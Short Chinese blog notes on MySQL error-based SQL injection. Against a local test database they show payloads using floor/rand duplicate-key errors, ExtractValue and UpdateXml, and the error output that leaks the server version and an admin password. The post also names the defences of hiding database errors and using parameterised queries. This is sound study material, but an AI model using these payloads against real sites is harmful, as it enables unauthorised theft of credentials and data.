放点原来的笔记。MySQL 在执行语句出错时会返回异常信息，而 PHP+MySQL 架构的网站往往又把这些数据库错误信息直接显示在页面上，这样就可以通过构造如下三种方法让特定数据出现在报错内容里。需要注意的是，这一切的前提是应用把数据库错误原样回显给用户；从防御角度看，关闭页面上的数据库错误回显并使用预处理语句（参数化查询），这条通道就不存在了。
实际测试环境:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过 floor 报错
可以通过如下一些利用代码：

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下：
首先进行正常查询：

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如 id 输入存在注入的话，可以通过如下语句触发报错：

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了 MySQL 的版本。如果需要查询其他数据，可以把 version() 所在位置替换成相应的查询语句。
例如我们需要查询管理员用户名和密码：
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
注意报错中 'admin8881' 末尾的 1 是 concat 里 floor(rand(0)*2) 拼接上去的，字段本身的值是 admin888。
2、ExtractValue
测试语句如下：

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程：

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句：

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程：

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.